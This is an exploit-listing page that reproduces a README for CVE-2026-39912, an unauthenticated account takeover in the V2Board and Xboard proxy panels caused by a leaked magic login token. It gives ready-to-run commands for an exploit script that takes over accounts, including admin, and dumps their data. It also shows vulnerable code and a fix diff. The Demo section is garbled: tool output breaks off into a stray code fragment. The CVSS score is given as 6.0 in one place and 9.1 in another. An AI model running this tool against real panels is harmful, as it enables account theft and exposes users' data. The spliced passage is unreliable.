Exploit for CVE-2026-39912

Name: Exploit for CVE-2026-39912
Rating: 5 (130 reviews)
2026-04-09 | CVSS 6.0
## https://sploitus.com/exploit?id=E64D8AAD-B20A-5B0E-8F1A-9D1C31338DDA
# CVE-2026-39912 - Xboard / V2Board Unauth Account Takeover

**Magic Link Token Leak in loginWithMailLink**

| | |
|---|---|
| **CVE** | CVE-2026-39912 |
| **CVSS** | 9.1 (Critical) |
| **CWE** | CWE-201 (Insertion of Sensitive Information Into Sent Data) |
| **Affected** | V2Board >= 1.6.1 through 1.7.4 / Xboard all versions through 0.1.9+ |
| **Fixed** | Not yet (V2Board abandoned since June 2023) |
| **Disclosed** | 2026-04-09 |
| **Credit** | [Valentin Lobstein (Chocapikk)](https://github.com/Chocapikk) |
| **Writeup** | [chocapikk.com](https://chocapikk.com/posts/2026/xboard-v2board-account-takeover/) |
| **Fix PRs** | [V2Board #981](https://github.com/v2board/v2board/pull/981) / [Xboard #873](https://github.com/cedar2025/Xboard/pull/873) |

## TL;DR

The `loginWithMailLink` endpoint returns the magic login link directly in the HTTP response body instead of only sending it via email. An unauthenticated attacker who knows a registered email can take over any account - including admin - in two HTTP requests.

## Affected Software

- [V2Board](https://github.com/v2board/v2board) - Open-source proxy protocol management panel (8.7k stars, abandoned)
- [Xboard](https://github.com/cedar2025/Xboard) - Fork of V2Board (4k+ stars, actively maintained)

Both are widely deployed VPN/proxy panels, primarily in China. ZoomEye shows 7,000+ instances exposed on the internet.

## Requirements

- `login_with_mail_link_enable` must be enabled in admin settings (not enabled by default)
- A valid registered email address

## Usage

```bash
# Install dependencies
pip install requests

# Account takeover + data dump
python3 exploit.py http://target:7001 admin@demo.com

# Save dump to file
python3 exploit.py http://target:7001 admin@demo.com -o dump.json
```

## Demo

```
$ python3 exploit.py http://target:7001 admin@demo.com

 Xboard / V2Board - Unauth Account Takeover
 Magic Link Token Leak (CVE-2026-39912) | by Choc
 V2Board >= 1.6.1 | Xboard  $link   // Token leaked to caller
]);
```

**Xboard** (`app/Services/Auth/MailLinkService.php`):
```php
$this->sendMailLinkEmail($user, $link);

return [true, $link]; // Same bug, inherited from fork
```

## The Fix

```diff
- return [true, $link];
+ return [true, true];
```

## References

- [V2Board - Vulnerable code (line 71)](https://github.com/v2board/v2board/blob/0ca47622a50116d0ddd7ffb316b157afb57d25e8/app/Http/Controllers/Passport/AuthController.php#L71)
- [Xboard - Vulnerable code (line 49)](https://github.com/cedar2025/Xboard/blob/1fe6531924cc1ec662a88b9ef725afcf78d660bc/app/Services/Auth/MailLinkService.php#L49)
- [Original commit introducing the bug (2022-06-27)](https://github.com/v2board/v2board/commit/bdb10bed32c5f37df2f0872c3cb354e9b7a293bd)